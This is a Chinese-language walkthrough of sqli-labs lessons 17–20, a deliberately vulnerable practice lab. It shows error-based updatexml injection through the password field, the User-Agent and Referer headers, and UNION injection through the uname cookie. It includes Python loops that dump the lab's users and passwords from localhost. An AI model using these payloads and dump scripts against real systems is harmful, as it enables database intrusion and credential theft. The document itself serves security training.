sqli-labs less17-20

LESS 17 基于错误的UPDATE查询

源码中的几个php函数:

  • get_magic_quotes_gpc()

magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“ ”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误

get_magic_quotes_gpc()就是取得php环境变量magic_quotes_gpc的值

  • addslashes() & stripslashes()

addslashes() 函数在指定的预定义字符前添加反斜杠:
单引号 (‘),双引号 (“),反斜杠 (),NULL

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。

  • ctype_digit()

检测字符串中的字符是否都是数字,负数和小数会检测不通过,这是验证是否正整数的函数简单方法

  • mysql_real_escape_string()

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

  • \x00
  • \n
  • \r
  • \
  • \x1a

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

  • intval(mixed $var [, int $base ])

通过使用特定的进制转换(默认是十进制),参数base表示进制,只有当var是字符串时,base才会有意义,表示按照base进制来对var进行转换,返回变量 var 的 integer 数值

通过源码可以得知,后台对输入的uname,如果是字符串,则先用mysql_real_escape_string()函数转义,再用单引号包裹,但是没有对passwd字段做处理,所以可以考虑对passwd字段进行注入,最后经过了解,发现这里需要使用updatexml报错注入

MYSQL函数:UPDATEXML(XML_document, XPath_string, new_value);

  • 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
  • 第二个参数:XPath_string (Xpath格式的字符串)
  • 第三个参数:new_value,String格式,替换查找到的符合条件的数据
  • 作用:改变文档中符合条件的节点的值

如果XPath_string的值不是XPath格式的字符串,则会报错:

> select updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~10.1.32-MariaDB~'

 

构造paylod(username填任意一个用户名都可):

User Name : admin
New Password : ‘ where username = updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);#

报错:

XPATH syntax error: ‘~10.1.32-MariaDB~’

于是按照例行步骤

User Name : admin
New Password : ‘ where username = updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);#

结果:XPATH syntax error: ‘~emails,referers,uagents,users~’

脚本爆破:

from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-17/"

i = 0
while True:
    data = {"uname":"admin", "passwd":"' where username = updatexml(1,concat(0x7e,(select username from users limit "+str(i)+",1),0x7e,(select password from users limit "+str(i)+",1),0x7e),1);#"}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    info = re.search(r"~.+~", response)
    if(info == None):
        break
    else:
        print(info.group())
    i += 1

 

结果:

~Dumb~Dumb~
~Angelina~I-kill-you~
~Dummy~p@ssword~
~secure~crappy~
~stupid~stupidity~
~superman~genious~
~batman~mob!le~
~admin~admin~
~admin1~admin1~
~admin2~admin2~
~admin3~admin3~
~dhakkan~dumbo~
~admin4~admin4~

LESS 18 HEADER注入-Uagent字段

本关登录前会显示IP地址,登录后显示request数据包的header字段
查看源码发现在显示header之前使用INSERT语句将header数据插入到uagents表中,考虑到可以在insert语句中使用updatexml函数报错,所以这里使用抓包工具修改header字段:

POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: localhost
Content-Length: 38
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: ‘ or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) or ‘
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://localhost/sqli-labs-master/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.536075346.1526537016
Connection: close

uname=admin&passwd=admin&submit=Submit

结果:

Your User Agent is: ‘ or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) or ‘


XPATH syntax error: ‘~10.1.32-MariaDB~’

接下来的步骤和上一关相同,脚本:

from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-18/"

i = 0
while True:
    data = {"uname": "admin", "passwd": "admin"}
    header = {"User-Agent": "' or updatexml(1,concat(0x7e,(select username from users limit "+str(i)+",1),0x7e,(select password from users limit "+str(i)+",1),0x7e),1) or '"}
    req = request.Request(url, data = parse.urlencode(data).encode(), headers = header)
    response = request.urlopen(req).read().decode()
    info = re.search(r"~.+~", response)
    if(info == None):
        break
    else:
        print(info.group())
    i += 1

 

LESS 19 HEADER注入-Referer字段

这关登录成功后显示的是header里的Referer字段,所以把上一关的User-Agent改成Referer即可成功,原理和上一关是一样的

LESS 20 COOKIE注入

源码中的判断语句有些长,梳理一下:

  1. 判断Cookie中的uname是否被设置,若没有,返回的是登录前界面,这里对username和password都做了输入检查,登陆成功后发放Cookie
  2. 若uname非空,则再判断submit是否被设置(即有Cookie的用户是否选择删除Cookie),若没有,则用uname作参数查询数据库并返回相应信息
  3. 若submit非空(即用户点击Delete Cookie按钮),则删除Cookie(即设置Cookie有效时间为负值)

由于未对cookie做输入检查,同时select语句使用了cookie的uname值
所以修改cookie为:
Cookie: uname=’ union select 1,2,3#; _ga=GA1.1.536075346.1526537016

结果

Your Login name:2
Your Password:3
Your ID:1

继续:

Cookie: uname=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#;

Cookie: uname=’ union select 1,group_concat(username),group_concat(password) from users#;

Cookie: uname=’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’#;

Cookie: uname=’ union select group_concat(id),group_concat(username),group_concat(password) from users#;

结果:

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Your ID:1,2,3,4,5,6,7,8,9,10,11,12,14

https://soporbear.github.io/2018/06/01/sqli-lab-less17-22/

你可能感兴趣的:(Web安全)